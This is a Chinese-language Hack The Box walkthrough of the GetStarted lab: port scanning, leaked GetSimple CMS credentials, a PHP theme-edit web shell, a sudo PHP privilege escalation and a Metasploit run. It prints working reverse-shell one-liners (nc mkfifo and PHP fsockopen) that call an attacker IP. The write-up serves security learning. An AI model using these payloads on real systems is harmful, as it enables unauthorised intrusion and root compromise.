HTB渗透学习-GETSTART

GETSTART

扫端口

nmap扫端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 01:51 EDT
Nmap scan report for 10.129.246.235
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 290.61 seconds
```                                                   

一个HTTP服务,一个SSH服务,先看HTTP服务

## 查看HTTP服务

直接浏览器打开,发现是一个CMS,叫GetSimple。

### 扫后台

dirsearch扫后台,发现一些可能有问题的路径

``` plain
[02:06:43] 301 -  316B  - /admin  ->  http://10.129.246.235/admin/          
[02:06:45] 200 -    1KB - /admin/                                           
[02:06:46] 302 -    0B  - /admin/download.php  ->  index.php?redirect=download.php?
[02:06:47] 200 -    1KB - /admin/index.php                                  
[02:06:50] 302 -    0B  - /admin/upload.php  ->  index.php?redirect=upload.php?
[02:07:14] 301 -  318B  - /backups  ->  http://10.129.246.235/backups/      
[02:07:14] 200 -  479B  - /backups/                                         
[02:07:38] 301 -  315B  - /data  ->  http://10.129.246.235/data/            
[02:07:38] 200 -  514B  - /data/                                            
[02:07:38] 200 -  509B  - /data/cache/                                      
[02:08:09] 200 -   12KB - /LICENSE.txt                                      
[02:08:44] 200 -  536B  - /plugins/                                         
[02:08:44] 301 -  318B  - /plugins  ->  http://10.129.246.235/plugins/
[02:08:52] 200 -  889B  - /readme.txt                                       
[02:08:55] 200 -   32B  - /robots.txt                                       
[02:08:58] 403 -  279B  - /server-status/                                   
[02:08:58] 403 -  279B  - /server-status                                    
[02:09:02] 200 -  257B  - /sitemap.xml                                      
[02:09:12] 301 -  316B  - /theme  ->  http://10.129.246.235/theme/
  • /backups里面啥都没有
  • /data 中有一个 /cache 文件夹,含有两个txt文档,其中一个文档存在cms版本 3.3.15
    • /cache
      1
      {"status":"0","latest":"3.3.16","your_version":"3.3.15","message":"You have an old version - please upgrade"}
    • /data/other/plugins.xml 里有两个插件登录
      1
      2
      3
      4
      5
      6
      7
      8
      9
      <item>
      <plugin>anonymous_data.php</plugin>
      <enabled>true</enabled>
      </item>
      <item>
      <plugin>InnovationPlugin.php</plugin>
      <enabled>true</enabled>
      </item>
      </channel>
    • /data/other/authorization.xml 里直接泄露API key
      1
      2
      3
      <item>
      <apikey>4f399dc72ff8e619e327800f851e9986</apikey>
      </item>
    • /data/uploads 疑似为上传路径
    • /data/users/admin.xml 直接泄露admin的账号密码,但这里的密码疑似是hash后的,因为直接试不行;hashcat后疑似是SHA1;SHA1反查后居然直接就是admin
      1
      2
      3
      4
      5
      6
      7
      8
      9
      <item>
      <USR>admin</USR>
      <NAME/>
      <PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
      <EMAIL>admin@gettingstarted.com</EMAIL>
      <HTMLEDITOR>1</HTMLEDITOR>
      <TIMEZONE/>
      <LANG>en_US</LANG>
      </item>

登入admin后台,反弹shell

这边直接通过泄露的信息登入admin后台,先不管其他的,看一圈后发现能修改Theme-Edit Theme

直接修改Theme,往Theme的代码里插一个phpinfo();,然后应用后成功执行。

尝试写webshell。

1
system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.55 9999 >/tmp/f");

保存,刷新,成功收到shell,同时使用pty获得可读性更好的shell,弄个bash出来

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

获得用户flag。

提权

找到一个有写权限的文件夹,本地开HTTP服务,靶机wget,传LinEnum.sh到靶机上

1
bash LinEnum.sh

发现可能可以用的:

1
2
3
4
5
6
7
8
9
10
[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php


[+] Possible sudo pwnage!
/usr/bin/php

/usr/bin/php 居然可以无密码sudo

1
sudo /usr/bin/php -r '$sock=fsockopen("10.10.16.55",9997); exec("/bin/bash -i <&3 >&3 2>&3");'

直接反弹root shell到攻击机上,成功得到root权限的shell,读rootflag。

直接使用MetaSploit

msfconsole里直接search getsimple,发现两个可用的exp,先用第二个试试

1
2
3
4
5
6
7
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 10.129.246.235
rhosts => 10.129.246.235
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set lhost 10.10.16.55
lhost => 10.10.16.55
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options

成功得到用户权限的meterpreter shell。后面提权即可